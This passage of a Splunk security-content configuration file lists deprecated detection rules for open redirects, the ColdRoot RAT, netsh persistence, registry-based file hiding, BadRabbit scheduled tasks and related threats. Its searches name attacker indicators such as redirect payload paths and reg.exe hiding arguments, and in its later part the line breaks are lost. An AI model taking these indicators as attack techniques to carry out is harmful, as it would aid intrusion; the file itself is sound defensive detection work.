is_visible = false
search = index=_internal sourcetype=splunk_web_access return_to="/%09/*" | `open_redirect_in_splunk_web_filter`

[ESCU - Osquery pack - ColdRoot detection - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for ColdRoot events from the osx-attacks osquery pack.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for ColdRoot events from the osx-attacks osquery pack.
action.escu.how_to_implement = In order to properly run this search, Splunk needs to ingest data from your osquery deployed agents with the [osx-attacks.conf](https://github.com/facebook/osquery/blob/experimental/packs/osx-attacks.conf#L599) pack enabled. Also, the [TA-OSquery](https://github.com/d1vious/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the osquery data populate the Alerts data model.
action.escu.known_false_positives = There are no known false positives.
action.escu.creation_date = 2019-01-29
action.escu.modification_date = 2019-01-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - Osquery pack - ColdRoot detection - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["ColdRoot MacOS RAT"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Osquery pack - ColdRoot detection - Rule
action.correlationsearch.annotations = {"analytic_story": ["ColdRoot MacOS RAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for ColdRoot events from the osx-attacks osquery pack.
action.notable.param.rule_title = Osquery pack - ColdRoot detection
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | from datamodel Alerts.Alerts | search app=osquery:results (name=pack_osx-attacks_OSX_ColdRoot_RAT_Launchd OR name=pack_osx-attacks_OSX_ColdRoot_RAT_Files) | rename columns.path as path | bucket _time span=30s | stats count(path) by _time, host, user, path | `osquery_pack___coldroot_detection_filter`

[ESCU - Processes created by netsh - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes launching netsh.exe to execute various commands via the netsh command-line utility. Netsh.exe is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper .dll when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe that are executing commands via the command line. Deprecated because we have another detection of the same type.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for processes launching netsh.exe to execute various commands via the netsh command-line utility. Netsh.exe is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper .dll when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe that are executing commands via the command line. Deprecated because we have another detection of the same type.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = It is unusual for netsh.exe to have any child processes in most environments. It makes sense to investigate the child process and verify whether the process spawned is legitimate. We explicitly exclude the "C:\Program Files\rempl\sedlauncher.exe" process path since it is a legitimate process by Microsoft.
action.escu.creation_date = 2020-11-23
action.escu.modification_date = 2020-11-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Processes created by netsh - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Netsh Abuse"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Processes created by netsh - Rule
action.correlationsearch.annotations = {"analytic_story": ["Netsh Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for processes launching netsh.exe to execute various commands via the netsh command-line utility. Netsh.exe is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper .dll when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe that are executing commands via the command line. Deprecated because we have another detection of the same type.
action.notable.param.rule_title = Processes created by netsh
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=netsh.exe by Processes.user Processes.dest Processes.parent_process Processes.parent_process_name Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `processes_created_by_netsh_filter`

[ESCU - Prohibited Software On Endpoint - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for applications on the endpoint that you have marked as prohibited.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for applications on the endpoint that you have marked as prohibited.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = None identified
action.escu.creation_date = 2019-10-11
action.escu.modification_date = 2019-10-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Prohibited Software On Endpoint - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Monitor for Unauthorized Software", "Emotet Malware DHS Report TA18-201A", "SamSam Ransomware"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Prohibited Software On Endpoint - Rule
action.correlationsearch.annotations = {"analytic_story": ["Monitor for Unauthorized Software", "Emotet Malware DHS Report TA18-201A", "SamSam Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `prohibited_processes` | `prohibited_software_on_endpoint_filter`

[ESCU - Reg exe used to hide files directories via registry keys - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search looks for command-line arguments used to hide a file or directory using the reg add command.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The search looks for command-line arguments used to hide a file or directory using the reg add command.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = None at the moment
action.escu.creation_date = 2019-02-27
action.escu.modification_date = 2019-02-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Reg exe used to hide files directories via registry keys - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Windows Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Reg exe used to hide files directories via registry keys - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search looks for command-line arguments used to hide a file or directory using the reg add command.
action.notable.param.rule_title = Reg exe used to hide files directories via registry keys
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = reg.exe Processes.process="*add*" Processes.process="*Hidden*" Processes.process="*REG_DWORD*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process = "(/d\s+2)" | `reg_exe_used_to_hide_files_directories_via_registry_keys_filter`

[ESCU - Remote Registry Key modifications - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search monitors for remote modifications to registry keys.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search monitors for remote modifications to registry keys.
action.escu.how_to_implement = To successfully implement this search, you must populate the `Endpoint` data model. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. Deprecated because I don't think the logic is right.
action.escu.known_false_positives = This technique may be legitimately used by administrators to modify remote registries, so it's important to filter these events out.
action.escu.creation_date = 2020-03-02
action.escu.modification_date = 2020-03-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Registry Key modifications - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Windows Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Remote Registry Key modifications - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search monitors for remote modifications to registry keys.
action.notable.param.rule_title = Remote Registry Key modifications action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Registry.registry_key_name) as registry_key_name values(Registry.registry_path) as registry_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_path="\\\\*" by Registry.dest , Registry.user | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `remote_registry_key_modifications_filter` [ESCU - Scheduled tasks used in BadRabbit ransomware - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for flags passed to schtasks.exe on the command-line that indicate that task names related to the execution of Bad Rabbit ransomware were created or deleted. Deprecated because we already have a similar detection action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for flags passed to schtasks.exe on the command-line that indicate that task names related to the execution of Bad Rabbit ransomware were created or deleted. Deprecated because we already have a similar detection action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = No known false positives action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Scheduled tasks used in BadRabbit ransomware - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Scheduled tasks used in BadRabbit ransomware - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This 
search looks for flags passed to schtasks.exe on the command-line that indicate that task names related to the execution of Bad Rabbit ransomware were created or deleted. Deprecated because we already have a similar detection action.notable.param.rule_title = Scheduled tasks used in BadRabbit ransomware action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process) as process from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe (Processes.process= "*create*" OR Processes.process= "*delete*") by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | search (process=*rhaegal* OR process=*drogon* OR *viserion_*) | `scheduled_tasks_used_in_badrabbit_ransomware_filter` [ESCU - Spectre and Meltdown Vulnerable Systems - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search is used to detect systems that are still vulnerable to the Spectre and Meltdown vulnerabilities. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Vulnerabilities"] action.escu.eli5 = The search is used to detect systems that are still vulnerable to the Spectre and Meltdown vulnerabilities. action.escu.how_to_implement = The search requires that you are ingesting your vulnerability-scanner data and that it reports the CVE of the vulnerability identified. 
action.escu.known_false_positives = It is possible that your vulnerability scanner is not detecting that the patches have been applied. action.escu.creation_date = 2017-01-07 action.escu.modification_date = 2017-01-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Spectre and Meltdown Vulnerable Systems - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Spectre And Meltdown Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Spectre and Meltdown Vulnerable Systems - Rule action.correlationsearch.annotations = {"analytic_story": ["Spectre And Meltdown Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2017-5753"], "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search is used to detect systems that are still vulnerable to the Spectre and Meltdown vulnerabilities. 
action.notable.param.rule_title = Spectre and Meltdown Vulnerable Systems action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Vulnerabilities where Vulnerabilities.cve ="CVE-2017-5753" OR Vulnerabilities.cve ="CVE-2017-5715" OR Vulnerabilities.cve ="CVE-2017-5754" by Vulnerabilities.dest | `drop_dm_object_name(Vulnerabilities)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spectre_and_meltdown_vulnerable_systems_filter` [ESCU - Splunk Enterprise Information Disclosure - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search allows you to look for evidence of exploitation for CVE-2018-11409, a Splunk Enterprise Information Disclosure Bug. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search allows you to look for evidence of exploitation for CVE-2018-11409, a Splunk Enterprise Information Disclosure Bug. action.escu.how_to_implement = The REST endpoint that exposes system information is also necessary for the proper operation of Splunk clustering and instrumentation. Whitelisting your Splunk systems will reduce false positives. action.escu.known_false_positives = Retrieving server information may be a legitimate API request. Verify that the attempt is a valid request for information. 
action.escu.creation_date = 2018-06-14 action.escu.modification_date = 2018-06-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Enterprise Information Disclosure - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Splunk Enterprise Information Disclosure - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 13"], "confidence": 50, "cve": ["CVE-2018-11409"], "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search allows you to look for evidence of exploitation for CVE-2018-11409, a Splunk Enterprise Information Disclosure Bug. 
action.notable.param.rule_title = Splunk Enterprise Information Disclosure action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = index=_internal sourcetype=splunkd_ui_access server-info | search clientip!=127.0.0.1 uri_path="*raw/services/server/info/server-info" | rename clientip as src_ip, splunk_server as dest | stats earliest(_time) as firstTime, latest(_time) as lastTime, values(uri) as uri, values(useragent) as http_user_agent, values(user) as user by src_ip, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_enterprise_information_disclosure_filter` [ESCU - Suspicious Changes to File Associations - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for changes to registry values that control Windows file associations, executed by a process that is not typical for legitimate, routine changes to this area. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for changes to registry values that control Windows file associations, executed by a process that is not typical for legitimate, routine changes to this area. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There may be other processes in your environment that users may legitimately use to modify file associations. If this is the case and you are finding false positives, you can modify the search to add those processes as exceptions. action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Changes to File Associations - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Windows Registry Activities", "Windows File Extension and Association Abuse"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious Changes to File Associations - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Windows Registry Activities", "Windows File Extension and Association Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, 
"kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for changes to registry values that control Windows file associations, executed by a process that is not typical for legitimate, routine changes to this area. action.notable.param.rule_title = Suspicious Changes to File Associations action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name FROM datamodel=Endpoint.Processes where Processes.process_name!=Explorer.exe AND Processes.process_name!=OpenWith.exe by Processes.process_id Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join [| tstats `security_content_summariesonly` values(Registry.registry_path) as registry_path count from datamodel=Endpoint.Registry where Registry.registry_path=*\\Explorer\\FileExts* by Registry.process_id Registry.dest | `drop_dm_object_name("Registry")` | table process_id dest registry_path]| `suspicious_changes_to_file_associations_filter` [ESCU - Suspicious Email - UBA Anomaly - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. 
This detection looks for emails that are suspicious because of their sender, domain rareness, or behavior differences. This is an anomaly generated by Splunk User Behavior Analytics (UBA). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} action.escu.data_models = ["Email", "UEBA"] action.escu.eli5 = This detection looks for emails that are suspicious because of their sender, domain rareness, or behavior differences. This is an anomaly generated by Splunk User Behavior Analytics (UBA). action.escu.how_to_implement = You must be ingesting data from email logs and have Splunk integrated with UBA. This anomaly is raised by a UBA detection model called "SuspiciousEmailDetectionModel." Ensure that this model is enabled on your UBA instance. action.escu.known_false_positives = This detection model will alert on any sender domain that is seen for the first time. This could be a potential false positive. The next step is to investigate and add the URL to an allow list if you determine that it is a legitimate sender. 
action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Email - UBA Anomaly - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Emails"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Suspicious Email - UBA Anomaly - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Emails"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_UEBA_Events.category) as category from datamodel=UEBA where nodename=All_UEBA_Events.UEBA_Anomalies All_UEBA_Events.UEBA_Anomalies.uba_model = "SuspiciousEmailDetectionModel" by All_UEBA_Events.description All_UEBA_Events.severity All_UEBA_Events.user All_UEBA_Events.uba_event_type All_UEBA_Events.link All_UEBA_Events.signature All_UEBA_Events.url All_UEBA_Events.UEBA_Anomalies.uba_model | `drop_dm_object_name(All_UEBA_Events)` | `drop_dm_object_name(UEBA_Anomalies)`| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_email___uba_anomaly_filter` [ESCU - Suspicious File Write - 
